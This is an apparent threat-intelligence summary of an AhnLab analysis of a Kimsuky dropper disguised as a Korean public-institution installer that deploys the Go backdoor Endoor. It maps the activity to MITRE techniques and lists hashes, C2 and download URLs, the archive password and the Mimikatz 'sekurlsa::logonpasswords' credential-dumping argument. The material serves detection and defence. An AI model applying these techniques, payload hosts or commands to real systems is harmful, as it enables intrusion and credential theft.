Keypoints
- Kimsuky-distributed dropper masquerades as an installer from a Korean public institution (uses institution logo and fabricated version info).
- Dropper contains WinRAR as “unrar.exe” and a compressed payload “src.rar” decrypted with password “1q2w3e4r” to deploy the Endoor backdoor.
- Endoor is a Golang backdoor (obfuscated), installs to %USERPROFILE%svchost.exe, and creates a Task Scheduler entry named “Windows Backup” for persistence.
- Endoor communicates with C2 servers hosted on ngrok-free[.]app and minish.wiki[.]gd and can download/update additional binaries (e.g., via curl to rdpclip.dat).
- Post-compromise activity includes credential dumping with Mimikatz (%ALLUSERSPROFILE%cache.exe) and a screenshot stealer built from Kbinani’s library that exfiltrates via a local proxy (127.0.0.1:8080).
- Nikidoor, another Kimsuky backdoor, shares C2 infrastructure and was also observed in related campaigns.
- Several artifacts are signed with a legitimate Korean company certificate, aiding defense evasion; AhnLab provided MD5 hashes, C2 URLs, and download locations for detection.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Used to deliver the dropper disguised as an installer (‘the dropper was disguised as an installer for a certain public institution in South Korea.’)
- [T1204] User Execution – Relies on user running the fake installer for initial execution (‘the malware is the only program that is installed in a normal way.’)
- [T1059] Command and Scripting Interpreter – Used curl/command-line to download additional payloads (‘downloaded from an external source using Curl, under the name “rdpclip.dat”.’)
- [T1036] Masquerading – Dropper uses institution logo, forged version info, and installer UI to appear legitimate (‘used the logo of the institution for its icon, and relevant keywords could be found in the version information and setup page.’)
- [T1053.005] Scheduled Task/Job: Scheduled Task – Endoor registers a scheduled task named “Windows Backup” for persistence (‘registers itself to the Task Scheduler under the name “Windows Backup”.’)
- [T1027] Obfuscated Files or Information – Payloads are obfuscated and embedded (Go obfuscation, embedded WinRAR and compressed archive) (‘The backdoor is developed in Golang and is obfuscated’ and uses a compressed file src.rar with a password.)
- [T1078] Valid Accounts (Code Signing used for evasion) – Dropper and related binaries are signed with a valid Korean company certificate to evade detection (‘signed with a valid certificate from a Korean company.’)
- [T1003.001] OS Credential Dumping: LSASS Memory – Mimikatz was used to extract credentials (‘installed Mimikatz … and the argument “sekurlsa::logonpasswords” was identified in the execution logs’)
- [T1113] Screen Capture – A screenshot-taking component was deployed to collect screen images using Kbinani’s library (‘captures and exfiltrates screenshots … created using Kbinani’s screenshot library’)
- [T1071.001] Application Layer Protocol: Web Protocols – Backdoor communicates with C2 servers over HTTP/HTTPS (‘Endoor’s C&C communications packet’ and C2 URLs on ngrok-free[.]app/minish.wiki[.]gd)
- [T1090.002] Proxy: External Proxy – Exfiltration appears routed via a local proxy (127.0.0.1) before leaving the host (‘the exfiltration address is a local host (“hxxp://127.0.0.1:8080/recv”).’)
- [T1567] Exfiltration Over Web Service – Data (screenshots) is exfiltrated over HTTP to a local proxy endpoint, implying chained exfiltration to external infrastructure (‘exfiltration address is a local host … may signify that the threat actor already installed a proxy’)
Indicators of Compromise
- [MD5 hashes] samples – b74efd8470206a20175d723c14c2e872 (dropper, signed *App.exe), 7034268d1c52539ea0cd48fd33ae43c4 (Endoor svchost.exe), and 3 more hashes.
- [C2 URLs] command-and-control domains – https://real-joey-nicely.ngrok-free[.]app/mir/index.php, http://minish.wiki[.]gd/index.php (also used by Nikidoor).
- [Download URLs] additional payload sources – hxxp://210.16.120[.]210/rdpclip.dat (presumed Endoor), hxxp://minish.wiki[.]gd/eng.db (Endoor variant).
- [File names / paths] deployment and tools – src.rar / unrar.exe (embedded decompressor), %USERPROFILE%svchost.exe (Endoor install path), %ALLUSERSPROFILE%cache.exe (Mimikatz), rdpclip.dat (downloaded payload).
The technical infection chain begins with a dropper crafted to resemble an installer from a Korean public institution: it includes the institution’s logo, fabricated version info, and embeds WinRAR as unrar.exe plus a compressed payload src.rar that is extracted with the hardcoded password “1q2w3e4r”. Execution of the dropper launches WinRAR to decompress and run the payload, which executes a Go-based, obfuscated backdoor known as Endoor.
On execution with the “install” argument, Endoor copies itself to %USERPROFILE%svchost.exe and creates a scheduled task (“Windows Backup”) that runs Endoor with the “backup” argument for persistence. The backdoor uses HTTP-based C2 channels (observed on ngrok-free[.]app and minish.wiki[.]gd), can download additional binaries via curl (e.g., rdpclip.dat from 210.16.120[.]210), and is capable of command execution, file transfer, process manipulation, and acting as a Socks5 proxy.
Post-compromise activity includes deployment of credential-dumping tools (Mimikatz placed at %ALLUSERSPROFILE%cache.exe and executed with “sekurlsa::logonpasswords”), and a screenshot-grabber built from the Kbinani library that posts captures to a local endpoint (http://127.0.0.1:8080/recv), indicating a local proxy may forward exfiltrated data externally. Multiple artifacts were signed with a valid Korean company certificate and several MD5 hashes, C2 URLs, and download locations were provided for detection and blocking.
Read more: https://asec.ahnlab.com/en/63396/